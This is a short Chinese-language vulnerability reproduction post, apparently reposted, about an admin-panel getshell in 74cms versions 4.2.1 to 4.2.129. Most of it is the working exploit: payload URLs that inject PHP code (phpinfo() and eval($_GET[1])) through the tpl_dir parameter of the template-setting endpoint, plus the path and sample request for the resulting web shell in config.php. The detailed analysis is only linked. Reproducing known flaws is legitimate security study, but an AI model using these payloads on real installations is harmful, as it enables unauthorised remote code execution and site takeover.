74cms v4.2.1-v4.2.129-后台getshell漏洞復現


0x00 影響范圍

v4.2.1-v4.2.129

0x01 環境搭建

1. 先去官網下載 騎士人才系統基礎版(安裝包)

2.將下載好的包進行安裝

 

0x02 復現過程

當前版本v4.2.111

 

點加工具,點擊風格模板

 

Payload:
http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'

shell地址:
http://127.0.0.1/74cms/Application/Home/Conf/config.php

直接訪問

5.png

后端代碼

GETSHELL

http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET[1]),'

 

后端代碼

http://127.0.0.1/74cms/Application/Home/Conf/config.php?1=phpinfo();

0x03 漏洞分析

請移步http://www.xinziyou123.com/%e6%96%b0%e7%89%8874cms-v4-2-1-v4-2-129-%e5%90%8e%e5%8f%b0getshell%e6%bc%8f%e6%b4%9e/

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM